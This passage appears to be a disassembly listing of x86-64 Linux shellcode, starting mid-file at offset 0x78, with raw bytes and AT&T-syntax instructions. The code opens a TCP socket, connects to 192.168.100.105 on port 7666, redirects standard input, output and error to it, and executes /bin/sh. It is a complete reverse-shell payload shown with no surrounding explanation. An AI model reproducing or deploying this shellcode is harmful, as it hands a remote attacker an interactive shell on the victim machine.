  78:	6a 29                	pushq  $0x29
  7a:	58                   	pop    %rax
  7b:	99                   	cltd   
  7c:	6a 02                	pushq  $0x2
  7e:	5f                   	pop    %rdi
  7f:	6a 01                	pushq  $0x1
  81:	5e                   	pop    %rsi
  82:	0f 05                	syscall 
  84:	48 97                	xchg   %rax,%rdi
  86:	48 b9 02 00 1d f2 c0 	movabs $0x6964a8c0f21d0002,%rcx
  8d:	a8 64 69 
  90:	51                   	push   %rcx
  91:	48 89 e6             	mov    %rsp,%rsi
  94:	6a 10                	pushq  $0x10
  96:	5a                   	pop    %rdx
  97:	6a 2a                	pushq  $0x2a
  99:	58                   	pop    %rax
  9a:	0f 05                	syscall 
  9c:	6a 03                	pushq  $0x3
  9e:	5e                   	pop    %rsi
  9f:	48 ff ce             	dec    %rsi
  a2:	6a 21                	pushq  $0x21
  a4:	58                   	pop    %rax
  a5:	0f 05                	syscall 
  a7:	75 f6                	jne    0x9f
  a9:	6a 3b                	pushq  $0x3b
  ab:	58                   	pop    %rax
  ac:	99                   	cltd   
  ad:	48 bb 2f 62 69 6e 2f 	movabs $0x68732f6e69622f,%rbx
  b4:	73 68 00 
  b7:	53                   	push   %rbx
  b8:	48 89 e7             	mov    %rsp,%rdi
  bb:	52                   	push   %rdx
  bc:	57                   	push   %rdi
  bd:	48 89 e6             	mov    %rsp,%rsi
  c0:	0f 05                	syscall 
